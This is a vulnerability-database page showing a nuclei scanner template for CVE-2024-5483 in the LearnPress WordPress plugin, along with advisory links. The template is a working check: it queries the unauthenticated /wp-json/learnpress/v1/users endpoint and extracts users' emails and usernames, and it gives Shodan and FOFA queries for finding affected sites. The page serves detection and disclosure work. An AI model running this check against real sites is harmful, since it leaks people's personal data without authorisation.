Lucene search
K

LearnPress < 4.2.6.8.1 - Information Disclosure

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

LearnPress WordPress LMS plugin up to 4.2.6.8.1 exposes user emails and basic info to unauthenticated users.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-5483
7 Feb 202619:20
circl
CVE
CVE-2024-5483
5 Jun 202402:34
cve
Cvelist
CVE-2024-5483 LearnPress – WordPress LMS Plugin <= 4.2.6.8 - Basic Information Disclosure via JSON API
5 Jun 202402:34
cvelist
EUVD
EUVD-2024-46693
3 Oct 202520:07
euvd
NVD
CVE-2024-5483
5 Jun 202403:15
nvd
OSV
CVE-2024-5483
5 Jun 202403:15
osv
Patchstack
WordPress LearnPress Plugin <= 4.2.6.8 is vulnerable to Sensitive Data Exposure
5 Jun 202400:00
patchstack
Patchstack
WordPress LearnPress plugin <= 4.2.6.8 - Basic Information Disclosure via JSON API vulnerability
5 Jun 202402:54
patchstack
Positive Technologies
PT-2024-36426
5 Jun 202400:00
ptsecurity
RedhatCVE
CVE-2024-5483
23 May 202509:16
redhatcve
Rows per page
id: CVE-2024-5483

info:
  name: LearnPress < 4.2.6.8.1 - Information Disclosure
  author: pussycat0x
  severity: medium
  description: |
    LearnPress – WordPress LMS Plugin contains a sensitive information exposure caused by incorrect implementation of get_items_permissions_check function in all versions up to 4.2.6.8, letting unauthenticated attackers extract user emails and basic information.
  impact: |
    Unauthenticated attackers can access sensitive user information, including emails, leading to privacy breaches.
  remediation: Update to version 4.2.6.9 or later.
  reference:
    - https://wpscan.com/vulnerability/1f253156-333b-4be6-b727-06237567be1e/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-5483
    epss-score: 0.01008
    epss-percentile: 0.5884
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2024,wordpress,wpscan,wp-plugin,learnpress,vuln,info-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/learnpress/v1/users"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "id","email","username","email")'
        condition: and

    extractors:
      - type: regex
        name: user_email
        part: body
        regex:
          - '"(?:email|user_email)"\s*:\s*"([^"@]+@[^"]+)"'
        group: 1
        internal: true

      - type: regex
        name: username
        part: body
        regex:
          - '"(?:username|user_login)"\s*:\s*"([^"]+)"'
        group: 1
        internal: true

      - type: dsl
        dsl:
          - "'Username: ' + username"
          - "'Email: ' + user_email"
# digest: 4a0a0047304502204c0789e1c067bda21e1a997ff120e48182c3f4a8300502ce6c031d663321e026022100dd8fc23a6da776a352e3e4a5a8925cbfe82e8bea8d2a7fc6956ba89bf7599dce:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2026 19:20Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
EPSS0.01008
SSVC
15